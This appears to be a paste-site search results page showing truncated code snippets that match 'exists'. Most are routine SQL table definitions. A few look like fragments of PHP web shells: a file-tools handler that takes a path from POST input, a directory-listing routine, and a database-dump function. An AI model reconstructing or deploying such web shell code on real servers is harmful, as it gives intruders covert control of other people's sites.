42.7K results in 798 ms
8 years ago · Jan 06, 2018, 04:00 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Jan 06, 2018, 03:58 PM
for table `clients` -- DROP TABLE IF EXISTS `clients`; /*!40101 SET @saved_cs_client
8 years ago · Jan 06, 2018, 02:42 PM
and CPU vendors. ## ############################################################################### delimiter // create database if not exists meltdown // use meltdown // drop table if exists assembly_code // create
8 years ago · Jan 06, 2018, 02:42 PM
Table 'proxies' -- -- --- DROP TABLE IF EXISTS `proxies`; CREATE TABLE `proxies` ( `addr` VARCHAR(21) NOT NULL, `type` TINYINT(1) NOT
8 years ago · Jan 06, 2018, 01:08 PM
CREATE TABLE IF NOT EXISTS copy_of_X LIKE X; INSERT IGNORE copy_of_X SELECT * FROM X;
8 years ago · Jan 06, 2018, 01:06 PM
Directory '".path()."' is not exists.")); if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable.")); print '<table width="100%" class="table_home" border="0" cellpadding="3"
8 years ago · Jan 06, 2018, 10:52 AM
structure for table `students` -- CREATE TABLE IF NOT EXISTS `students` ( `id` int(11) DEFAULT
8 years ago · Jan 06, 2018, 08:04 AM
s = connArg.createStatement(); String newDatabaseString = "CREATE DATABASE IF NOT EXISTS " + dbNameArg; // String newDatabaseString = "CREATE
8 years ago · Jan 06, 2018, 07:52 AM
CREATE TABLE IF NOT EXISTS `votes` ( `playerName` char(50) DEFAULT NULL, `ip` int(50) DEFAULT NULL, `time` int(50) DEFAULT NULL, `recieved` int(50) DEFAULT NULL, )
8 years ago · Jan 06, 2018, 07:10 AM
look up GUID, if exists, show, if not, show error. if(lookup_guid == "current")
8 years ago · Jan 06, 2018, 06:22 AM
structure for table campaigns CREATE TABLE IF NOT EXISTS `campaigns` ( `id` int(11) unsigned
8 years ago · Jan 06, 2018, 05:54 AM
for a MySQL table CREATE TABLE `users` ( `id` INT( 11 ) NOT NULL AUTO_INCREMENT PRIMARY KEY
8 years ago · Jan 06, 2018, 05:48 AM
work function gvv_add_db() { safe_query("CREATE TABLE IF NOT EXISTS ".safe_pfx('gvv_user_edit')." (name VARCHAR (64)
8 years ago · Jan 06, 2018, 05:14 AM
for `shop_categories` -- ---------------------------- DROP TABLE IF EXISTS `shop_categories`; CREATE TABLE `shop_categories` ( `id` int(8) NOT NULL AUTO_INCREMENT, `name` varchar(255)
8 years ago · Jan 06, 2018, 04:22 AM
IF EXISTS `medias_for_user`; DROP TABLE IF EXISTS `medias_for_user_tmp`; CREATE TEMPORARY TABLE `medias_for_user` ( `media_id`
8 years ago · Jan 06, 2018, 03:52 AM
drop table if exists articles; create table articles ( article_id int unsigned not null auto_increment primary key,
8 years ago · Jan 06, 2018, 02:50 AM
Table structure for `account_db` -- ---------------------------- CREATE TABLE IF NOT EXISTS `account_db` ( `Name` text NOT
8 years ago · Jan 06, 2018, 02:32 AM
Directory '".path()."' is not exists.")); if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable.")); print '<table width="100%" class="table_home" border="0" cellpadding="3"
8 years ago · Jan 06, 2018, 01:58 AM
global $mysqllink; $tabledump = "DROP TABLE IF EXISTS `$table`;\n"; $res = q("SHOW CREATE TABLE $table"); $create = mysql_fetch_row($res);
8 years ago · Jan 06, 2018, 12:50 AM
drop table if exists texts; create table `texts` ( `id` int(10) unsigned not null auto_increment, `object_id` int(10)
Total pages: 2134